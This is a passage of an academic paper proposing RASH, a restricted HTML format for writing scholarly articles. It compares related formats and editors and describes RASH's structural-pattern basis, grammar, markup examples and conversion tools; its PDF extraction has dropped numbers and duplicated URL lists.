instance, is a syntax to produce scholarly articles according to a markdown (http://daringfireball.net/ projects/markdown/) input. sharelatex (https://www.sharelatex.com/) is a web-based real-time collaborative editor for latex documents. in table we briefly summarise the features and capabilities of the formats presented, in order to highlight the main differences between them. html-based formats one of the first documented contributions that proposed an html-based format for scholarly articles was scholarly html (http://scholarlyhtml.org). it is not defined as a formal grammar, but as a set of descriptive rules which allows one to specify just a reduced amount of html tags for describing the metadata and content of a scholarly article. it is the main intermediate format used in contentmine (http://contentmine.org) for describing the conversion of pdf content into html. along the same lines, pubcss (https://github.com/thomaspark/pubcss/) is a project which aims at pushing the use of html+css for writing scholarly articles. it does not define a formal grammar for the html element set to use. rather it provides some html templates according to four different css styles, which mimic four latex styles for computer science articles, i.e., acm sig proceedings, acm sigchi proceedings, acm sigchi extended abstracts, and ieee conference proceedings. htmlbooks (https://github.com/oreillymedia/htmlbook/) is an o’reilly’s specification for creating html documents (books, in particular) by using a subset of all the (x)html elements. this is one of the first public works by a publisher for pushing html-like publications, even if the status of its documentation (and, consequently, of its schema) is still ‘‘unofficial’’. another project, which shares the same name of one of the previous ones, scholarly html (https://github.com/scienceai/scholarly.vernacular.io), is a work by the science.ai (http://science.ai) company that aims at providing a domain-specific data format based on open standards (among which html ) for enabling ‘‘the interoperable exchange of scholarly articles in a manner that is compatible with off-the-shelf browsers’’ (berjon & ballesteros, ). while the format is not defined by any particular formal grammar, it has peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://cs.unibo.it/save-sd/ /index.html http://cs.unibo.it/save-sd/ /index.html http://scholarlymarkdown.com/ http://daringfireball.net/projects/markdown/ http://daringfireball.net/projects/markdown/ https://www.sharelatex.com/ http://scholarlyhtml.org http://contentmine.org https://github.com/thomaspark/pubcss/ https://github.com/oreillymedia/htmlbook/ https://github.com/scienceai/scholarly.vernacular.io http://science.ai http://dx.doi.org/ . /peerj-cs. table a comparison among existing html-oriented formats for scholarly papers according to seven distinct categories. format syntax doc formal grammar semantic annotations css for different formats wysiwyg editor conversion from conversion to rasha html available onlineb relaxngc rdfa, rdf/xml, turtle, json-ld web-based and springer lncs apache openoffice, mi- crosoft word, rash javascript editor (raje) odt, docx latex: acm icps, acm journal large, peerj cs, springer lncs scholarly html ( )d html available online e none rdfa none none pdf (via contentmine— normaf) none pubcssg html available onlineh informal (via html templates) none acm sig proceedings, acm sigchi proceedings, acm sigchi extended abstracts, and ieee confer- ence proceedings none none pdf (via browser interface) html booksi html available onlinej xml schemak none css files for pdf print- ing and epub/mobi- compatible device visualisa- tions none none none scholarly html ( )l html available onlinem none rdfa, json-ld web-based microsoft word (as refer- enced onlinen and their on- line platform (no access for free guaranted as of june ) docx none scholarly html ( )o html available onlinep none rdfa, json-ld web-based none none none dokieli format html available onlineq informal (via html templates and patterns) rdfa, turtle, json-ld, trig web-based (native and ba- sic), springer lncs, acm icps dokielir none pdf (via browser interface) (continued on next page) p eronietal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) format syntax doc formal grammar semantic annotations css for different formats wysiwyg editor conversion from conversion to fiduswriter format html none none none web-based fiduswriters none html, epub, latex authorea format html none none none web-based authorea t docx, latex docx, latex (accord- ing to several stylesheets), pdf, zipped structure with html notes. ahttps://github.com/essepuntato/rash/. bhttp://cs.unibo.it/save-sd/rash. chttps://raw.githubusercontent.com/essepuntato/rash/master/grammar/rash.rng. dhttp://scholarlyhtml.org/. ehttp://scholarlyhtml.org/core-specification/. fhttps://github.com/contentmine/norma. ghttps://github.com/thomaspark/pubcss/. hhttp://thomaspark.co/ / /pubcss-formatting-academic-publications-in-html-css/. ihttps://github.com/oreillymedia/htmlbook/. jhttp://oreillymedia.github.io/htmlbook/. khttps://raw.githubusercontent.com/oreillymedia/htmlbook/master/schema/htmlbook.xsd. lhttps://github.com/scienceai/scholarly.vernacular.io. mhttp://scholarly.vernacular.io/. nhttps://science.ai/overview. ohttps://github.com/w c/scholarly-html. phttps://w c.github.io/scholarly-html/. qhttps://dokie.li/docs. rhttp://dokie.li. shttps://www.fiduswriter.org. thttps://www.authorea.com. p eronietal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com https://github.com/essepuntato/rash/ http://cs.unibo.it/save-sd/rash https://raw.githubusercontent.com/essepuntato/rash/master/grammar/rash.rng http://scholarlyhtml.org/ http://scholarlyhtml.org/core-specification/ https://github.com/contentmine/norma https://github.com/thomaspark/pubcss/ http://thomaspark.co/ / /pubcss-formatting-academic-publications-in-html-css/ https://github.com/oreillymedia/htmlbook/ http://oreillymedia.github.io/htmlbook/ https://raw.githubusercontent.com/oreillymedia/htmlbook/master/schema/htmlbook.xsd https://github.com/scienceai/scholarly.vernacular.io http://scholarly.vernacular.io/ https://science.ai/overview https://github.com/w c/scholarly-html https://w c.github.io/scholarly-html/ https://dokie.li/docs http://dokie.li https://www.fiduswriter.org https://www.authorea.com http://dx.doi.org/ . /peerj-cs. the main aim of the linkedresearch project is to propose principles for enabling researchers to share and reuse research knowledge by means of existing web and semantic web technologies towards a future world where researchers can publish and consume human-friendly and machine-readable (e.g., by using rdfa (sporny, )) scholarly documents. a well-described documentation (berjon & ballesteros, ) that teaches how to produce scholarly documents by using a quite large set of html tags, accompanied by schema.org (http://schema.org) annotations for describing specific structural roles of documents as well as basic metadata of the paper. the company also provides services that enable the conversion from microsoft word document into scholarlyhtml format. one of the authors of the previous work is also the chair of a w c community group called ‘‘scholarly html’’ (https://www.w .org/community/scholarlyhtml/) which aims at developing a html vernacular (https://github.com/w c/scholarly-html) for the creation of a web-first format for scholarly articles. it involves several people from all the aforementioned specifications (including rash), and the group work should result in the release of a community-proposed interchange html format. as of september , , the online documentation (https://w c.github.io/scholarly-html/) is mainly a fork of the scholarly html specification proposed by science.ai discussed above. html-oriented wysiwyg editors one of the most important and recent proposals, which is compliant with the principles introduced as part of the linked research (http://linkedresearch.org) project , is dokieli (https://dokie.li) (capadisli et al., ). dokieli is a web application (still under development) that allows the creation of html-based scholarly articles directly on the browser, and implements several features among which are annotations (in rdf) and a notification system. the application makes also available some html templates and a series of widgets for navigating, visualising (in different formats) and printing research documents easily by using common browsers. fidus writer (https://www.fiduswriter.org/) is another web-based application for creating html scholarly documents by means of a wordprocessor-like interface. while the particular format used is not explicitly specified, it allows the conversion of the html documents created within the application in two different formats, i.e., epub and latex (alongside with html). authorea (https://www.authorea.com) is a web service that allows users to write papers by means of a clear and effective interface. it enables the inclusion of the main components of scientific papers such as inline elements (emphasis, quotations, etc.), complex structures (figures, equations, etc.), and allows the use of markdown and latex for adding more sophisticated constructs. in addition, authorea is able to export the document in four different formats (pdf, latex, docx, and zipped archive with several html files) and according to a large number of stylesheets used in academic venues. which “web-first” format for research articles? the term ‘‘web-first’’ format indicates the possibility of using html as a primary format to write, store and transfer research articles, and not only to make these articles available on the web. some questions naturally arise in this context: shall we use the full html? if we impose a limited subset, which elements should we consider? shall we demand specific rules for using the language? peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://schema.org https://www.w .org/community/scholarlyhtml/ https://github.com/w c/scholarly-html https://w c.github.io/scholarly-html/ http://linkedresearch.org https://dokie.li https://www.fiduswriter.org/ https://www.authorea.com http://dx.doi.org/ . /peerj-cs. note that accepting html as format for submissions in conferences/workshops is a totally different issue, since this choice is normally taken by the organisers. for instance, see the save-sd call for papers (http://cs.unibo.it/save- sd/ /submission.html) and the various editions of sepublica (http://ceur- ws.org/vol- /). some works, e.g., capadisli, riedl & auer ( ), suggest not to force any particular html structure for research papers. this choice would allow authors to use whatever html structure they want for writing papers and would reduce (even, eliminate) the fear for the template bottleneck, i.e., the fact that users may not adopt a particular language if they are compelled to follow specific rules. on the other hand, leaving to the authors the freedom of using, potentially, the whole html specification may affect, in some way, the whole writing and publishing process of articles. the author could adopt any kind of html linearisation, e.g., using elements div instead of elements section, using elements table for their presentational behaviour (i.e., how they are rendered by browsers or other software readers) and not for presenting tabular data, and the like. this freedom could result in two main kinds of issues: • visualisation bottleneck—it may affect the correct use of existing, well-developed and pretty standard csss (e.g., capadisli’s csss developed for dokieli (https://dokie.li)) for both screen and print media, in having to write new codes for handling paper visualisation correctly; • less focus on the research content—the fact that a certain paper is not visualised in a browser very well (or, worse, in a way that is not the one the author expects) could bring the author to work on the presentation of the text, rather than on focussing on the actual research content of the text. another point against the use of any html syntax for writing papers concerns the possibility of enabling an easy way for sharing the paper with others (e.g., co-authors) who, potentially, may not use html in the same way. if all the co-authors of a paper are able to use the full html, they may not understand other users’ specific use of some html tags —‘‘why did they use the elements section instead of div?’’; ‘‘what is this freaky use of elements table?’’. hence, the advantages of using a common html format is quite evident: only one syntax and only one possible semantics. there is a further issue worth mentioning. having a shared, unambiguous and simple format would facilitate conversions from/into other complex ones (e.g., odt (jtc /sc wg , ), ooxml (jtc /sc wg , ), docbook (walsh, ), jats (national information standards organization, ), thus enabling authors to use their own text editors or word-processors to modify the articles. the conversion is instead much more complex, error-prone and imprecise on the full html. to complicate an already complex scenario there is the necessary involvement of publishers. allowing the authorsto use their ownhtml format couldbe counterproductive from a publisher’s perspective, in particular when we speak about the possibility of adopting such html formats for regular conference/journal camera-ready submissions. from a recent discussion on the force mailing list (https://groups.google.com/forum/#!topic/ forcnet/g bnaoomjmm), it emerges that publishers are willing to adopt html for submissions if and only if it is a clear community need. it means that they will include html formats in the publishing workflow only once a number of conference organisers decides to include html among the accepted formats for paper submissions . however, using one clear web-first format, rather than a plethora of possible variations allowed by peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://cs.unibo.it/save-sd/ /submission.html http://cs.unibo.it/save-sd/ /submission.html http://ceur-ws.org/vol- / http://ceur-ws.org/vol- / https://peerj.com https://dokie.li https://groups.google.com/forum/#!topic/forcnet/g bnaoomjmm https://groups.google.com/forum/#!topic/forcnet/g bnaoomjmm http://dx.doi.org/ . /peerj-cs. oasis legaldocumentml is the standardisation of akomantoso (http: //www.akomantoso.org/), which is a set of simple technology-neutral electronic representations in xml format of parliamentary, legislative and judiciary documents, and has been already adopted by several parliaments in european union, africa, and south america. the full html schema, would certainly lighten the burden of publishers for including html within their publishing workflow. this inclusion could be additionally favoured by the availability of services (e.g., editors, converters, enhancers, visualisers) for facilitating the use of such a web-first format within the existing publishing environments. last but not least, using a controlled subset of html is more appropriate for semantic publishing applications (shotton et al., ; peroni, b). the development of scripts and applications to extract, for instance, rdf statements directly from the markup structure of the text is a sort of nightmare if different authors use html in different manners. for instance, what happens when trying to extract the rhetorical organisation of a scientific paper according to the document component ontology (doco) (http://purl.org/spar/doco) (constantin et al., ) from two html documents that use html tags in different ways? is an html element table an actual table (containing tabular data)? which are the tags identifying sections? these analyses are all easier within a controlled and unambiguous subset of html. writing scholarly articles in html with rash the subset of html we propose in rash is strictly compliant to a patterns theory we have developed over the past few years. patterns are widely accepted solutions to handle recurring problems. firstly introduced for architecture and engineering problems (alexander, ), they have been successfully deployed in computer science and in particular in software engineering (gamma et al., ). in this section, we briefly introduce our patterns for document engineering and then we go into the details of rash. theoretical foundations: structural patterns while we have plenty of tools and languages for creating new markup languages (e.g., relaxng (clark & makoto, ) and xmlschema gao, sperberg-mcqueen & thompson, ), these usually do not provide any particular guideline for fostering the development of robust and well-shaped document languages. in order to fill that gap, in the last decade we have experimented with the use of a theory of structural patterns for markup documents (di iorio et al., ), that has since been applied in several national and international standards, among which oasis legaldocumentml (https://www.oasis-open.org/committees/legaldocml/) , a legal document standard for the specification of parliamentary, legislative and judicial documents, and for their interchange between institutions in different countries. the basic idea behind this theory is that each element of a markup language should comply with one and only one structural pattern, depending on the fact that the element: • can or cannot contain text (+t in the first case, −t otherwise); • can or cannot contain other elements (+s in the first case, −s otherwise); • is contained by another element that can or cannot contain text (+t in the first case, −t otherwise). peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.akomantoso.org/ http://www.akomantoso.org/ https://peerj.com http://purl.org/spar/doco https://www.oasis-open.org/committees/legaldocml/ http://dx.doi.org/ . /peerj-cs. by combining all these possible values—i.e.,±t,±s, and±t—we basically obtain eight core structural patterns, namely (accompanied by a plausible example within the html elements): . inline [+t+s+t], e.g., the element em; . block [+t+s−t], e.g., the element p; . popup [−t+s+t], e.g., the element aside; . container [−t+s−t], e.g., the element section; . atom [+t−s+t], e.g., the element abbr; . field [+t−s−t], e.g., the element title; . milestone [−t−s+t], e.g., the element img; . meta [−t−s−t], e.g., the element link. instead of defining a large number of complex and diversified structures, the idea is that a small number of structural patterns are sufficient to express what most users need for defining the organisation of their documents. therefore, the two main aspects related to such patterns are: • orthogonality—each pattern has a specific goal and fits a specific context. it makes it possible to associate a single pattern to each of the most common situations in document design. conversely, for every situation encountered in the creation of a new markup language, the corresponding pattern is immediately selectable and applicable; • assemblability—each pattern can be used only in some contexts within other patterns. this strictness provides expressiveness and non-ambiguity in the patterns. by limiting the possible choices, patterns prevent the creation of uncontrolled and misleading content structures. such patterns allow authors to create unambiguous, manageable and well-structured markup languages and, consequently, documents, fostering increased reusability (e.g., inclusion, conversion, etc.) among different languages. also, thanks to the regularity they provide, it is possible to perform easily complex operations on pattern-based documents even when knowing very little about their vocabulary (automatic visualisation of document, inferences on the document structure, etc.). in this way, designers can implement more reliable and efficient tools, can make a hypothesis regarding the meanings of the document fragments, can identify singularities and can study the global properties of a set of documents, as described in di iorio et al. ( ) and di iorio et al. ( ). html does not use the aforementioned patterns in a systematic way, as it allows the creation of arbitrary and, sometimes, quite ambiguous structures. to apply the structural pattern guidelines for rash, we restricted html by selecting a good subset of elements expressive enough to capture the typical components of a scholarly article while being also well-designed, easy to reuse and robust. rash: research article in simplified html the research articles in simplified html (rash) format is a markup language that restricts the use of html (http://www.w .org/tr/html /) elements to only elements for writing academic research articles. it allows authors to use embedded rdf annotations. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.w .org/tr/html / http://dx.doi.org/ . /peerj-cs. please refer to the official rash documentation, available at https: //rawgit.com/essepuntato/rash/master/ documentation/index.html, for a complete introduction of all the elements and attributes that can be used in rash documents. the following prefixes are always mandatory in any rash document: •schema: http://schema.org/ •prism: http://prismstandard.org/ namespaces/basic/ . /. in addition, rash strictly follows the digital publishing wai-aria module . (garrish et al., ) for expressing structural semantics on various markup elements used. all rash documents begin as a simple html document (hickson et al., ), by specifying the generic html doctype followed by the document element html with the usual namespace (‘‘http://www.w .org/ /xhtml’’) and with additional (and mandatory) prefix declarations through the attribute prefix . the element html contains the element head for defining metadata of the document according to the dcterms (http: //dublincore.org/documents/dcmi-terms/) and prism (http://www.prismstandard.org/) standards and the element body for including the whole content of the document. the element head of a rash document must include some information about the paper, i.e., the paper title (element title), at least one author, while other related information (i.e., affiliations, keywords and categories included using the elements meta and link) are optional. the element body mainly contains textual elements (e.g., paragraphs, emphases, links, and quotations) for describing the content of the paper, and other structural elements (e.g., abstract, sections, references, and footnotes) used to organise the paper in appropriate blocks and to present specific complex structures (e.g., figures, formulas, and tables). in the following subsection, we provide a quick discussion about usage patterns in rash, and introduce the tools used for developing its grammar. development and patterns the development of rash started from the whole html grammar, and proceeded by removing and restricting the particular use of html elements, to make them expressive enough for representing the structures of scholarly papers and to have the language totally compliant with the theory on structural patterns for xml documents (di iorio et al., ) introduced in ‘theoretical foundations: structural patterns’. the systematic use of these structural patterns is an added value in all stages of the documents’ lifecycle: they can be guidelines for creating well-engineered documents and vocabularies, rules to extract structural components from legacy documents, indicators to study to what extent documents share design principles and community guidelines. all these characteristics have allowed us to simplify, at least to some extent, the handling of all the requirements introduced in ‘introduction’ and ‘which ‘‘web-first’’ format for research articles?’ in rash. table shows what is the current pattern assignment for each element in rash. notice that we do not use two patterns presented in ‘theoretical foundations: structural patterns’, namely atom and popup. the elements compliant with the former pattern are contained in discursive blocks (e.g., paragraphs) and contain only textual content with no additional elements. this is very infrequent in scholarly writings since any element used for emphases, links, and other in-sentence elements can always contain additional elements (e.g., an emphasis can contain a link). a different discourse can be done for the pattern popup, which is meant to represent complex substructures that interrupt but do not break the main flow of the text, such as footnotes (di iorio et al., ). an element compliant to the popup pattern, while still not allowing directly text content inside itself, is found in elements with a mixed context peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://rawgit.com/essepuntato/rash/master/documentation/index.html https://rawgit.com/essepuntato/rash/master/documentation/index.html https://rawgit.com/essepuntato/rash/master/documentation/index.html http://schema.org/ http://prismstandard.org/namespaces/basic/ . / http://prismstandard.org/namespaces/basic/ . / https://peerj.com http://www.w .org/ /xhtml http://dublincore.org/documents/dcmi-terms/ http://dublincore.org/documents/dcmi-terms/ http://www.prismstandard.org/ http://dx.doi.org/ . /peerj-cs. table the use of structural patterns in rash. pattern rash element inline a, code, em, math, q, span, strong, sub, sup, svg block figcaption, h , p, pre, th popup none container blockquote, body, figure, head, html, li, ol, section, table, td, tr, ul atom none field script, title milestone img meta link, meta [t+s+]. in particular, in developing rash, we discussed which of the following two possible approaches for defining footnotes was more adequate to our needs. the first option was a container-based behaviour, also suggested by jats (national information standards organization, ) by means of the element fn-group and not included in html specifications, that allows the authors to specify footnotes (through the element ft) by using a tag that is totally separated from the main text from which it is referenced (usually through xml attributes), as shown in the following excerpt: <-- a paragraph referring to a footnote --> <p> in this paragraph there is an explicit reference to the second footnote <xref rid="n "></xref >. </p> <-- the group containing all the footnotes --> <fn-group > <fn id="n "> <p>this is a paragraph within a footnote.</p> </fn> <fn id="n "> <p>this is a paragraph in another footnote.</p> <p> all the footnotes are contained in a group , so as to collect them together. </p> </fn> ... </fn-group > the alternative was a popup-based behaviour, used by default in latex (through the marker \footnote{}) and even possible in jats (which is a very permissive language by design), where a paragraph can be abruptly interrupted by one or more paragraphs specified in a footnote, as shown in the following excerpt: <-- a paragraph containing a footnote --> <p> in this paragraph the footnote <fn id="n "><p>that is what we call popup -based behaviour !.</p></fn> has been defined directly within it. </p> we considered the latter approach a bit confusing, since it actually decreases the readability of the html source where footnotes are needed. we thus decided to adopt a solution similar to the jats fn-group element, extending the html section element with @role set to doc-endnotes and doc-endnote: peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the content model of an element is the particular organisation of its content in terms of text, attributes and elements that it can contain. <-- a paragraph referring to a footnote --> <p> in this paragraph there is an explicit reference to the second footnote <a href ="# fn "></a>. </p> <-- the group containing all the footnotes --> <section role="doc -endnotes"> <section role="doc -endnote" id="fn "> <p>this is the text of a footnote.</p> </section > <section role="doc -endnote" id="fn "> <p>this is the text of another footnote.</p> </section > ... </section > grammar and peculiarities the formal grammar of rash (https://raw.githubusercontent.com/essepuntato/rash/ ef c f ea fb f e d eda /grammar/rash.rng) (current version: . . ) has been developed by means of relaxng (clark & makoto, ), which is a simple, easy to learn, and powerful schema language for xml. the grammar has been logically organised in four distinct logical blocks of syntactic rules, defining respectively elements, attributes, content models for the elements and their related attribute lists, as summarised in the following excerpt: ... <define name="p"> <element name="p"> <ref name=" attributes_html_element_no_role" /> <ref name=" cm_inline" /> </element > </define > ... <define name=" aclass"> <attribute name="class"> <data type=" nmtokens" /> </attribute > </define > ... <define name=" cm_inline"> <zeroormore > <choice > <text /> <ref name="a" /> <ref name="aref" /> <ref name="img" /> <ref name="svg" /> <ref name="math" /> <ref name=" img_math" /> <ref name=" span_latex" /> <ref name="span" /> <ref name="code" /> <ref name="sub" /> <ref name="sup" /> <ref name="em" /> <ref name=" strong" /> <ref name="q" /> </choice > </zeroormore > </define > ... <define name=" attributes_html_element_no_role"> <ref name=" attributes_html_generic" /> <optional > <ref name=" aclass" /> </optional > <ref name=" attributes_rdfa" /> </define > ... peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://raw.githubusercontent.com/essepuntato/rash/ ef c f ea fb f e d eda /grammar/rash.rng https://raw.githubusercontent.com/essepuntato/rash/ ef c f ea fb f e d eda /grammar/rash.rng http://dx.doi.org/ . /peerj-cs. in the paper, for the sake of clarity, we use the prefix ‘‘@’’ when we name attributes (e.g., the attribute named ‘‘role’’ is introduced as @role), while we just name elements with their name (e.g., section). starting from the latest versions of the language, there has been a clear shift towards an extended use of html semantic elements, despite the fact they are not backwards compatible with their more generic alternatives in html (raggett, le hors & jacobs, ). in particular, the elements section, figure, and figcaption have been adopted so as to clearly refer to paper sections and boxes with tables, figures, listings and formulas, accompanied by a particular caption. while this choice has fostered the readability of the source, the use of these html elements was not enough to provide proper semantics and accessibility to the rash source. thus, in order to improve the user experience in terms of accessibility of such html-based papers, rash reuses some items from the w c accessible rich internet applications . (diggs et al., ), and also exploits several roles introduced in the digital publishing wai-aria module . (garrish et al., ), which allows the ‘‘digital publishers to apply the structural semantics they need to drive the authoring process while getting free accessibility’’ (https://lists.w .org/archives/public/public-dpub-aria/ feb/ .html). the use of such semantics is implemented by means of the attribute @role , that can be used on certain rash elements, e.g., sections, and it is very useful for specifying a clear structural semantics where it is not formally defined. for instance, all the references are organised in a list within a special section defined by using the element section with the attribute @role set to ‘‘doc-bibliography’’. this special section contains one list with a bibliographic reference for each list item (i.e., the element li accompanied by the attribute @id for referencing to it within the text and the attribute @role set to ‘‘doc-biblioentry’’), as shown in the following excerpt: <section role="doc -bibliography"> <h >references </h > <ol> <li id=" per " role="doc -biblioentry"> <p>write here the reference entry.</p> </li> ... </ol> </section > formulas require special consideration, since there are different ways to implement them. the standard specification for representing mathematics on the web is mathml (carlisle, ion & miner, ). even if mathml is the best accessible way for writing mathematical formulas, the organisation of the elements for defining even a simple formula is quite verbose and this is a reasonable obstacle to its direct adoption, as shown in the following excerpt for describing the formula πr : <math xmlns="http ://www.w .org / / math/mathml"> <mi>π </mi> <mo ><!-- &invisibletimes; --></mo> <msup > <mi>r</mi> <mn > </mn> </msup > </math > to help the creator of rash documents in dealing with formulas, rash adds two other ways for writing formulas in addition to mathml. the first one is to use an image (element img), which is a very simple way to include maths in a paper. on the other hand, it is not accessible at all since the various elements of the formula are not marked-up properly peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://lists.w .org/archives/public/public-dpub-aria/ feb/ .html http://dx.doi.org/ . /peerj-cs. so as to distinguish them. another option is to use latex (or, alternatively, asciimath: http://asciimath.org), which is one of the most common ways to write formulas in many scientific papers. both options are specifiable in rash by using either the element img or the element span respectively, accompanied by the attribute @role set to ‘‘math’’, as shown in the following excerpt: <-- specifying a formula through the element 'img ' --> <img role="math" src=" formula.png" alt="r^ " /> <-- specifying a formula in latex through the element 'span ' --> <span role="math">\pi r^ </span > the rendering of any latex or asciimath formula and the multi-browser support for mathml is implemented by using mathjax (https://www.mathjax.org/), which is a javascript display engine for mathematics that works in most modern browsers. of course, it is necessary to explicitly import mathjax in the element head if any rendering of formulas is actually needed, as shown in the following: <!-- mathjax for multi -browser support of latex formulas and mathml --> <script src="https :// cdnjs.cloudflare.com/ajax/libs/mathjax / . . / mathjax.js?config=tex -ams - mml_htmlormml"> </script > rash has been developed in order to allow anyone to add rdfa annotations (sporny, ) to any element of the document. for instance, this paragraph contains the following rdf statement (in turtle (prud’hommeaux & carothers, )): @prefix cito: <http :// purl.org/spar/cito/> . <> cito:credits <http ://www.w .org/tr/rdfa -syntax/> . that was implemented by using specific rdfa attributes (@property and @resource, in this case) within the paragraph content, while the prefixes were defined in the element html, as shown in the following excerpt: <html prefix ="cito: http :// purl.org/spar/cito/"> ... <p> rash has been developed in order to allow anyone to add <span property ="cito:credits" resource ="http ://www.w .org/tr/rdfa -syntax/">rdfa </span > annotations <a href ="# rdfa"></a> to any element of the document. </p> ... </html > in addition to rdfa, rash makes available another way to inject rdf statements (cyganiak, wood & lanthaler, ) to the document, by means of an element script (within the element head): • with the attribute type set to ‘‘text/turtle’’ for adding plain turtle content (prud’hommeaux & carothers, ); • with the attribute type set to ‘‘application/ld+json’’ for adding plain json-ld content (sporny, kellogg & lanthaler, ); • with the attribute type set to ‘‘application/rdf+xml’’ for adding plain rdf/xml content (gandon & schreiber, ). an example of the use of the script for turtle and json-ld statements is shown in the following excerpt: peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://asciimath.org https://www.mathjax.org/ http://dx.doi.org/ . /peerj-cs. <script type="text/turtle"> @prefix pro: <http :// purl.org/spar/pro/> . @prefix foaf: <http :// xmlns.com/foaf / . /& gt; . @prefix sd: <https :// w id.org/scholarlydata/person /> . sd:silvio -peroni a foaf:person ; foaf:givenname "silvio" ; foaf:familyname "peroni" ; foaf:homepage <http ://www.essepuntato.it> ; pro:holdsroleintime [ a pro:roleintime ; pro:withrole pro:author ; pro:relatestodocument <> ] . </script > <script type=" application/ld+json"> { "@context ": { "nick": "http :// xmlns.com/foaf / . / nick", "sd": "https :// w id.org/scholarlydata/person /" }, "@id": "sd:silvio -peroni", "nick": ["s.", "essepuntato "] } </script > it is worth noticing that rash does not require any particular vocabulary for introducing rdf statements, except three properties from schema.org (http://schema.org) for defining author’s metadata (see the rash documentation (https://rawgit.com/essepuntato/rash/ master/documentation/index.html#metadata) for additional details). for instance, in this document (in particular, in its rash version (https://w id.org/people/essepuntato/ papers/rash-peerj .html)) we mainly use cito (peroni & shotton, ) and other spar ontologies (peroni, a) for creating citation statements about the paper itself, but alternative and/or complementary vocabularies are freely usable as well. the rash framework one of the issues we had to face, and in general anyone has to face when proposing a new markup language, was to provide tools for writing papers in rash. it is undeniable that: • not all the potential authors are able (or willing) to write scholarly articles in html, even within the web community; • not all the potential authors are able (or willing) to manually add additional semantic annotations, even within the semantic web community. the authorial activity of writing an article by using rash, but also any other new web-first format, must be supported by appropriate interfaces and tools to reach a broad adoption. a possible solution was to implement a native html authoring environment, so that authors did not have to deal directly with the new language. however, this solution would have forced all co-authors to use to the same tool and introduced a variety of technical difficulties, since it is not easy to create and support a user friendly and flexible work environment. we believe that a more liberal approach, that allows each author to keep using her/his preferred tools, even off-line, is more practical. this is the idea behind the rash framework (https://github.com/essepuntato/rash) (peroni, ): a set of specifications and writing/conversion/extraction tools for peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://schema.org https://rawgit.com/essepuntato/rash/master/documentation/index.html#metadata https://rawgit.com/essepuntato/rash/master/documentation/index.html#metadata https://w id.org/people/essepuntato/papers/rash-peerj .html https://w id.org/people/essepuntato/papers/rash-peerj .html https://github.com/essepuntato/rash http://dx.doi.org/ . /peerj-cs. figure rash framework. the rash framework and its main components. writing articles in rash. in this section, we give a brief description of all the tools we have developed in the framework. all the software components are distributed under an isc license (http://opensource.org/licenses/isc), while the other components are distributed under a creative commons attribution . international license (http://creativecommons.org/licenses/by/ . /). a summary of the whole framework is introduced in fig. . validating rash documents rash has been developed as a relaxng grammar (clark & makoto, ), i.e., a well- known schema language for xml documents. all the markup items it defines are fully compatible with the html specifications (hickson et al., ). in order to check whether a document is compliant with rash, we developed a script (https://github.com/essepuntato/rash/blob/master/tools/rash-check.sh) to enable rash users to check their documents simultaneously both against the specific requirements in the rash relaxng grammar and also against the html specification through w c nu html checker (http://validator.w .org/nu/). this will hopefully help rash users to timely detect and fix any mistakes in their documents. this script also checks datatype microsyntaxes. in addition to the aforementioned script, we developed a python application (https://github.com/essepuntato/rash/tree/master/tools/rash-validator) that enables one to validate rash documents against the rash grammar. this application makes also available a web interface for visualising all the validation issues retrieved in rash documents. visualising rash documents the visualization of a rash document is rendered by the browser by means of appropriate css (http://www.w .org/style/css/specs.en.html) stylesheets (atkins jr, etemad & rivoal, ) and javascript developed for this purpose. rash adopts external libraries, such as bootstrap (http://getbootstrap.com/) and jquery (http://jquery.com/), in order to provide the current visualisation and include additional tools for the user. for instance, the footbar with statistics about the paper (i.e., number of peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://opensource.org/licenses/isc http://creativecommons.org/licenses/by/ . / https://github.com/essepuntato/rash/blob/master/tools/rash-check.sh http://validator.w .org/nu/ https://github.com/essepuntato/rash/tree/master/tools/rash-validator http://www.w .org/style/css/specs.en.html http://getbootstrap.com/ http://jquery.com/ http://dx.doi.org/ . /peerj-cs. the layouts currently available are web- based and springer’s lecture note in computer science (http://www.springer. com/computer/lncs?sgwid= - - - - )—the latter is based on the springer lncs css included in dokieli (http://dokie.li) (capadisli et al., ). words, figures, tables and formulas) and a menu to change the actual layout of the page , the automatic reordering of footnotes and references, the visualisation of the metadata of the paper, etc. note that this kind of automatic rendering of paper items, such as references to a bibliographic entry or a figure, reduce the cognitive effort of an author when writing a rash paper. for instance, a piece of text referencing a table, e.g., ‘‘as shown in table ’’, is created without caring about the particular text to specify for that reference (‘‘table ’’ in the example), since rash prescribes to specify just an empty link to the object one wants to refer to, as shown in the following excerpt: <p>... as shown in <a href ="# table_patterns "></a> ...</p> for these objects, the javascript scripts decide which is the most suitable text to put there according to the type of the item referenced. converting rash into latex styles we spent some effort in preparing xslt . documents (kay, ) for converting rash documents into different latex styles, such as acm icps (http://www.acm. org/sigs/publications/proceedings-templates) and springer lncs (http://www.springer. com/computer/lncs?sgwid= - - - - ), among the others. we believe this is essential to foster the use of rash within international events and to easily publish rash documents in the official latex format currently required by the organisation committee of such events. obviously, the full adoption of rash or any other web-first format would make these stylesheets not necessary but, currently, they are fundamental for the adoption of the overall approach. producing rash from odt and docx we also developed two xslt . documents to perform conversion from apache openoffice documents (https://github.com/essepuntato/rash/blob/master/xslt/from- odt.xsl) and microsoft word documents (https://github.com/essepuntato/rash/blob/ master/xslt/from-docx.xsl) into rash documents. the rash documentation provides a detailed description of how to use apache openoffice (https://rawgit.com/essepuntato/ rash/master/documentation/rash-in-odt.odt) and microsoft word (https://rawgit. com/essepuntato/rash/master/documentation/rash-in-docx.docx) for writing scientific documents that can be easily converted to the rash format. the standard 